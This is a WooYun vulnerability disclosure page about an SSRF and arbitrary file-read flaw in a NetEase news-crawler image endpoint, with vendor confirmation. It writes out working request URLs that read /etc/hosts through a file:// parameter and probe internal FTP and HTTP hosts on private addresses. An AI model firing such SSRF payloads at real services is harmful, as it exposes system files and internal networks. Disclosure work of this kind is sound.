当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170154

漏洞标题:网易ssrf可内网拓扑(差点进内网)听说沾沾王子的殺气会怀孕

相关厂商:网易

漏洞作者: Dickeye

提交时间:2016-01-15 16:30

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

网易某处文件读取可内网拓扑(差点进内网)听说沾沾王子的殺气会怀孕
某处ssrf,曾经提交过的业务,当时只是下线处理,这次居然没修复就又上线了

详细说明:

http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=file://///etc/hosts

屏幕快照 2016-01-15 下午2.28.58.png


可以进行文件读取
当然http,ftp等协议都可以了
内网某处ftp,不过都是前端的咯
http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=ftp://192.168.86.43/inc/

屏幕快照 2016-01-15 下午2.30.55.png


一些内网后台
http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.26

屏幕快照 2016-01-15 下午2.32.30.png


http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://10.100.21.3/message.shtml

屏幕快照 2016-01-15 下午2.33.39.png


http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.52.111

屏幕快照 2016-01-15 下午2.33.13.png


http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.191
禅道项目
不多弄别的了
附一丁点内网ip信息

内网ip及对应产品副本.png


漏洞证明:

同上

修复方案:

下线吧,如果想用的话,别忘了修复后上线了

版权声明:转载请注明来源 Dickeye@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-19 15:40

厂商回复:

漏洞已确认,我们将尽快修复。感谢您对网易产品的关注!

最新状态:

暂无